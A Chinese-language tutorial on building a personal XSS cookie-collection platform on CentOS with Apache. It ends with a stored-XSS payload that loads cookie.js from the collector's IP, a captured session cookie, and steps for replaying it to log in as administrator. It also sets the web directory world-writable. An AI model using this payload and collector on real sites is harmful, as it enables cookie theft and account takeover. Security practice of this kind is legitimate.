一、前言
本平台是個人輕量級XSS測試平台,僅作為練習參考。
二、實驗環境
服務器操作系統:Centos 7
Web容器:Apache
三、平台搭建過程
安裝Apache
安裝PHP
安裝Git工具
從GitHub克隆XSS平台源碼
# 刪除默認網站內容
rm -rf /var/www/*
# 創建新的網站目錄
mkdir /var/www/xss
從GitHub克隆xss測試源碼(https://github.com/firesunCN/BlueLotus_XSSReceiver.git)
git clone https://github.com/firesunCN/BlueLotus_XSSReceiver.git /var/www/xss/
# 給xss目錄
chmod -R 777 /var/www/xss/
配置Apache
# 創建虛擬主機配置文件夾
mkdir /etc/httpd/conf/vhost
# 創建並編輯虛擬機配置文件
vi /etc/httpd/conf/vhost/httpd-vhosts.conf
添加以下內容:
<VirtualHost *:80>
DocumentRoot "/var/www/xss"
DirectoryIndex admin.php
</VirtualHost>
# 編輯httpd.conf文件
vi /etc/httpd/conf/httpd.conf
# 允許使用 .htaccess文件
# 添加之前創建的虛擬主機
Include /etc/httpd/conf/vhost/httpd-vhosts.conf
# 開機啟動Apache服務
chkconfig httpd on
# 重新加載Apache配置文件
systemctl start httpd
回到瀏覽器訪問服務器結果顯示無法訪問網站,經過排查是防火牆攔了。
# 命令行配置防火牆開放80端口
firewall-cmd --zone=public --add-port=80/tcp --permanent
# 重啟防火牆
systemctl restart firewalld
安裝XSS平台
# 訪問服務器ip地址,點擊安裝
# 主要修改后台登錄密碼和數據加密密碼,其余保持默認,然后提交
若報錯則手動安裝,手動安裝步驟:
# 首先切換到網站跟目錄
cd /var/www/xss
# 將配置文件改名
mv config_sample.php config.php
# 刪除install.php文件
rm -f install.php
# 若要修改密碼信息只需修改config.php文件
安裝成功,點擊登錄
成功登錄
功能測試
# 點擊我的JS,插入模板,選擇Defualt.js,修改網站服務器ip地址
http://192.168.75.129/index.php
# 生成payload
<script src="http://192.168.75.129/myjs/cookie.js"></script>
# 成功獲取用戶cookie
ASPSESSIONIDCQBSTQBB=BHILNFDBLNPBDMOBFPHNOFBJ
# 利用Google瀏覽器插件edit this cookie修改cookie登錄
到此存儲型xss注入獲取管理員cookie並登錄已經圓滿完成。